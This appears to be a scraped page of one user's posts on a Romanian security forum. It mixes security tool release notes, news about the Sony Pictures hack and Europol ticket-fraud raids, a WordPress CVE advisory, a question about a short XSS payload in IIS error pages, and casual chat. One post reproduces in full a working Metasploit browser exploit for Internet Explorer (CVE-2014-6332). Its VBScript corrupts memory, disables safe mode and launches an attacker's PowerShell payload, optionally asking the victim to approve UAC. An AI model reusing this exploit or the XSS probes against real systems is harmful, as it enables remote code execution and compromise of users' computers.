Aerosol

Hesperbot Scanner is a windows binary that is able to detect the Hesperbot banking trojan by fingerprinting memory and looking for things that traditional antivirus software fails to catch early during the malware campaigns. Download

PacketFence is a fully supported, trusted, Free and Open Source network access control (NAC) solution. Boasting an impressive feature set including a captive-portal for registration and remediation, centralized wired and wireless management, 802.1X support, layer-2 isolation of problematic devices, integration with the Snort IDS and the Nessus vulnerability scanner; PacketFence can be used to effectively secure networks - from small to very large heterogeneous networks. Changes: This is a minor release with new features, enhancements and important bug fixes. This release is considered ready for production use and upgrading from 4.5.0 is advised. Mai multe aici:PacketFence: Overview Download SHA1 sum: ebf432c4b76b3d7ff6cc61bf003bf72a5a8d5840

Capstone is a multi-architecture, multi-platform disassembly framework. It has a simple and lightweight architecture-neutral API, thread-safe by design, provides details on disassembled instruction, and more. Changes: This release isa stable version with major changes on the core and bindings. Download

Multam @io.kent vin si eu cu un mic update Update: Maligno 1.4 Changes: Code housekeeping. Better organization with /libs. Improved data validation (config and profiles), error detection and error description. Various updates and improvements. Download

@Casper00 nu o sa iti dea nimeni mura in gura, cauta pe forum si o sa gasesti uite https://rstforums.com/forum/63834-cum-se-sparg-parolele-wifi-wep-wpa-wpa2-manual-pentru-incepatori.rst aici un inceput! ( ai nevoie de Linux) si vezi ca aici nu e categoria cereri/ajutor asa ca inceteaza cu off-topicul.

Link-ul merge doar ca nu e un link de download de acolo poti sa Cumperi cartea. oricum ce e cu voi fratilor nu puteti vorbi cu o femeie, nu puteti saruta o femeie fara instructiuni?

@Casper00 nu, nu o poti afla daca ai fost conectat la retea cand nu aveau parola si apoi au adaugat...

Cyberthieves who used stolen credit cards to buy airline tickets have been targeted in a series of raids. Europol co-ordinated the raids at airports, targeting people who were trying to travel using a fraudulently bought ticket. In total, 118 people were arrested at 80 airports in 45 countries during the raids. Airlines lose more than $1bn (£640m) a year to the trade in fraudulent tickets, said Europol. Europol said the raids marked the start of an initiative called Global Airport Action, which will build on the links forged between police forces, airlines and credit card companies in preparation for the raids. These links helped to spot when tickets bought with stolen cards were being used to check in at an airport during the two days of the action. Police officers then swooped on the individuals using the tickets. Command centres in The Hague, Singapore and Bogota helped to direct the checking of tickets and travel documents as well as identifying individuals arrested. Some of those arrested were already known to police and had been arrested before for trading in tickets. In a statement, Europol said the stolen credit cards also helped organised crime groups keep operating and to facilitate the drug trade and human trafficking.

Following the last week's massive hack attack on Sony Pictures' network by a group calling themselves "#GOP," or Guardians of Peace, high-quality versions of several of the studio's newest films have hit piracy websites. It seems like matters for Sony Pictures is getting worse with time. Sony Pictures Entertainment has reportedly begun investigating links to North Korea of the possible cyberattack occurred last week that made the studio’s internal email systems offline, which was still offline at the time of writing. Now its five movie screeners – Annie, Fury, Still Alice, Mr. Turner and To Write Love on Her Arms – have made their way onto torrent file-sharing websites, though it has not been confirmed that the leak of all the films came from the same breach. "Still Alice" starring Julianne Moore, Alec Baldwin – US release date: Jan 16, 2015 "Mr Turner" starring Timothy Spall. – US release date: Dec 19, 2014 "Annie" starring Jamie Foxx and Cameron Diaz. – US release date: Dec 19, 2014 "Fury" starring Brad Pitt – US release date: Oct 17, 2014 "To Write Love on Her Arms" – US release date: March 2015 Except Fury, which was released in October, the other four movies have yet to hit the big screen, TorrentFreak reports. Previously it was reported that the hackers group #GOP compromised one of Sony Pictures’ servers, which caused all computers used by the studio to go down. An image with the words "Hacked by #GOP" threatened the company with a list of unspecified demands and warned the company that it would release sensitive data if the movie studio didn't cooperate. So, it appears that this leak could be the first of such leaks. Last week, Sony Pictures information-technology departments had instructed their staff to disconnect their computers and personal devices from the company's network, following the massive cyberattack. By Friday, it was believed that the staff at the company were forced to do their work with pen and paper and that it could take up to three weeks to completely get out of the massive breach. Sony could not immediately be reached for comment but told Variety it was working with law enforcement officials to investigate the massive cyberattack. "The theft of Sony Pictures Entertainment content is a criminal matter, and we are working closely with law enforcement to address it," a Sony spokeswoman said in a statement. Source

@Htich bune treaba dar mai bine criptai parola sa nu apara tot felul de copii

Bine ai venit.

Bre nu ai inteles esentialul, copii sunt fericiti ca nu se duc la scoala On:// La multi ani romania pentru a doua oara

<http://tetraph.com/security/open-redirect/cve-2014-8754-wordpress-ad-manager-plugin-dest-redirect-privilege-escalation/#respond> *CVE-2014-8754 WordPress “Ad-Manager Plugin” Dest Redirect Privilege Escalation* Exploit Title: WordPress Ad-Manager Plugin Dest Redirect Privilege Escalation Vulnerability Product: WordPress Ad-Manager Plugin Vendor: CodeCanyon Vulnerable Versions: 1.1.2 Tested Version: 1.1.2 Advisory Publication: Nov 25, 2014 Latest Update: Nov 25, 2014 Vulnerability Type: URL Redirection to Untrusted Site [CWE-601] CVE Reference: CVE-2014-8754 CVSS v2 Base Score: 5.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:N) (legend) Impact Subscore: 4.9 Exploitability Subscore: 8.6 Credit: Wang Jing [SPMS, Nanyang Technological University, Singapore] *Advisory Details* *(1) Product:* “WordPress Ad-Manager offers users a simple solution to implement advertising into their posts, their blog or any other WordPress page. Users can use pictures and images or HTML snippets like Google AdSense to incorporate advertising in an easy way.” *(2) Vulnerability Details:* The Dest Redirect Privilege Escalation vulnerability occurs at “track-click.php” page with “&out” parameter. *References:* http://tetraph.com/security/cves/cve-2014-8754-wordpress-ad-manager-plugin-dest-redirect-privilege-escalation/ http://codecanyon.net/item/wordpress-admanager/544421 https://wordpress.org/plugins/ad-manager-for-wp/ http://cwe.mitre.org http://cve.mitre.org/ Source

Hello everyone, I found some weird HTML code injection in an IIS error message. IIS spits out some part of the user input that generated the error message, but will only display 20 characters at most. My question is: is it possible to actually exploit an XSS with this ? Here is an example: HTTP Request: mypage?search=%3cb%20onclick%3dalert(1)>%3e HTTP Response (real): <p>An error has occured.</p> <p>Exception HttpRequestValidationException occurred while attempting <b>mypage</b></p> <p>Exception message is: <b>A potentially dangerous Request.QueryString value was detected from the client (search="<b onclick=alert(1)>...").</b></p> <p>Stack trace:</p> <pre> Server stack trace: [..] My payload was: <b onclick=alert(1)>> and it works (after clicking). However, can this actually be exploited in real life ? I tried stuff in 20 characters like: <embed src=http://x> or <img src=http://x/z> but no luck. Has anyone ever tried this before ? Thanks, P.S. This might be a silly question with an obvious answer. If so, I'd be grateful to have some extra information (links, docs etc.). Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/powershell' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserAutopwn include Msf::Exploit::Powershell autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "3.0", :ua_maxver => "10.0", :javascript => true, :os_name => OperatingSystems::Match::WINDOWS, :rank => ExcellentRanking }) def initialize(info={}) super(update_info(info, 'Name' => "Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution", 'Description' => %q{ This module exploits Windows OLE Automation Array Vulnerability known as CVE-2014-6332. The vulnerability affects Internet Explorer 3.0 until version 11 within Windows95 up to Windows 10. Powershell is required on the target machine. On Internet Explorer versions using Protected Mode, the user has to manually allow powershell.exe to execute in order to be compromised. }, 'License' => MSF_LICENSE, 'Author' => [ 'Robert Freeman', # IBM X-Force 'yuange', # twitter.com/yuange75 'Rik van Duijn', # twitter.com/rikvduijn 'Wesley Neelen', # security[at]forsec.nl 'GradiusX <francescomifsud[at]gmail.com>', 'b33f', # @FuzZySec ], 'References' => [ [ 'CVE', '2014-6332' ], [ 'MSB', 'MS14-064' ], [ 'OSVDB', '114533' ], [ 'EDB', '35229' ], [ 'EDB', '35308' ], [ 'URL', 'http://securityintelligence.com/ibm-x-force-researcher-finds-significant-vulnerability-in-microsoft-windows' ], [ 'URL', 'https://forsec.nl/2014/11/cve-2014-6332-internet-explorer-msf-module' ] ], 'Platform' => 'win', 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], ], 'BrowserRequirements' => { :source => /script|headers/i, :ua_name => HttpClients::IE, :os_name => /win/i, :arch => 'x86', :ua_ver => lambda { |ver| ver.to_i.between?(4, 10) } }, 'DefaultOptions' => { 'HTTP::compression' => 'gzip' }, 'Payload' => { 'BadChars' => "\x00" }, 'Privileged' => false, 'DisclosureDate' => "Nov 13 2014", 'DefaultTarget' => 0)) register_options( [ OptBool.new('TRYUAC', [true, 'Ask victim to start as Administrator', false]), ], self.class ) end def vbs_prepare() code = %Q| dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() neline function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runaaaa() end function function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function | end def get_html() if datastore['TRYUAC'] tryuac = 'runas' else tryuac = 'open' end payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true }) payl.slice! "powershell.exe " prep = vbs_prepare() html = %Q| <!doctype html> <html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <body> <script language="VBScript"> function runaaaa() On Error Resume Next set shell=createobject("Shell.Application") shell.ShellExecute "powershell.exe", "#{payl}", "", "#{tryuac}", 0 end function </script> <script language="VBScript"> #{prep} </script> </body> </html> | end def on_request_exploit(cli, request, target_info) print_status("Requesting: #{request.uri}") send_exploit_html(cli, get_html()) end end Source

THE ELECTRONIC FREEDOM FOUNDATION has announced a worldwide coalition of organisations dedicated to the fight for net neutrality. The Global Net Neutrality Coalition defines the term thus: "Net neutrality requires that the internet be maintained as an open platform, on which network providers treat all content, applications and services equally, without discrimination." Comprising 25 organisations from 19 countries, the coalition will use its site as a repository for information regarding net neutrality laws and legislation in given territories, along with advice on petitioning the relevant authorities to preserve an equal internet for all. The announcement is clear that it does not want to prevent internet service providers using techniques to ensure smooth traffic, for example preventing DDoS attacks or offering different packages to consumers. But it does insist that tiering should not be used "as a pretext to police communications on their networks, to bestow unfair commercial advantages on their own or particular third-party content, or to create a walled garden where only certain applications, services or protocols are welcome". Net neutrality is most recognised as a hot button topic in the US, where the Federal Communications Commission (FCC) is currently deliberating on whether to deregulate the internet to allow 'fast' and 'slow' lanes. A decision in favour of doing so would go against the wishes of over three million commenters who told the FCC that they did not want to see this happen, and President Obama, who publicly came out as a supporter of net neutrality, appealing to the FCC to reclassify broadband as a public utility, thus tightening controls over it. The issue is relevant around the world, however. Only Brazil and The Netherlands have so far ratified legislation to ensure net neutrality, but the European Union came out squarely in favour of preserving an open internet earlier this year. However, it has emerged in recent weeks that key stakeholders in the EU have been making overtures about doing exactly the opposite, with plans to open fast lanes for businesses across Europe as part of proposals by the Italian presidency. EU digital commissioner Günther Oettinger said last week that it was more important to ensure rural broadband availability than to preserve net neutrality, suggesting that broadband providers ought to be able to "reap the benefits" of supplying less financially viable locations. Source

Some of the world's best threat detection platforms have been bypassed by custom malware in a demonstration of the fallibility of single defence security. Five un-named top advanced threat detection products were tested against four custom malware samples written by researchers at Crysys Lab, Hungary. The most capable of the malware samples, dubbed BAB0 (or 'Hobbit' in the researchers' native tongue), slipped past each product having infected through image steganography, a feat within the capabilities of savvy criminals. "It was designed to be as stealthy as possible, and utilises multiple methods to avoid detection," the lab's seven researchers wrote in a paper titled An independent test of APT attack detection appliances. "Actually, this test case simulates attackers with moderate resources and some understanding of the state-of-the-art detection tools and how advanced malware work. "For example, this can simulate organised criminals when attacking high value targets." BAB0 was written in C++ with a server side in PHP and never appeared in the clear in net traffic due to the use of steganography. Scripts pulled the executable from the image after users clicked. The malware then ducked sandboxes with obfuscated HTML and JavaScript code. A decoy program was presented to the victim while the hobbit scurried off hiding command and control traffic in HTML traffic appearing as user clicks. Command types sent to BAB0 included directory traversal, file transfer, and command execution. Another less sophisticated malware offering bypassed three of the unnamed platforms while the basic offerings were caught by all five. "The main message of this work is that novel anti-APT tools can be bypassed with moderate effort," the report read. "If we were able to develop samples that were not detected by these tools without actually having access to any of the tested products during the development phase, then resourceful attackers who may be able to buy these products will also be able to develop similar samples, or even better ones." Much lazier attackers could hang out for BAB0 to be published at later date, a move designed to help bolster security technology in interested companies. The researchers were now pondering a testing framework for zero-day browser exploits. Source

@io.kent sa ne traiesti bre

La Multi ani Romania

Frate nu trebuie confundat anti-malware cu anti-virusul documenteaza-te si dupa vino aici sa comentezi daca nu stii taci... nu are rost sa imi bat capu cu tine.

@Apeiron pune frate kali linux merge perfect si pe 512mb RAM windows-ul e un mare rahat si daca ai 1GB RAM merge pus windows 7 asa ca nu esti obligat sa folosesti windows xp.

Daca si MalwareBytes e anti-virus eu imi dau foc... ATENTIE pentru toti MalwareBytes este ANTI-MALWARE nu anti-virus el merge folosit in paralel cu un anti-virus.. Adobe Flash Player Anti-virus (poti sa iti pui pe langa el si un anti-malware + firewall) Winamp (sau ce folosesti tu pentru a asculta muzica) Browser (Chrome / Mozilla) WinRAR cam asta sunt acum depinde de ce ai tu nevoie...

Bine ai venit tinere.

Ai putea sa faci pe mai multe culori si utilizatorul sa poata folosi ce culoare vrea Ex: default -alb/negru si bagi diferite culori asa va prinde

Ce vrei sa spui prin chestia asta fiindca din ceea ce ai zis nu se intelege nimic omule...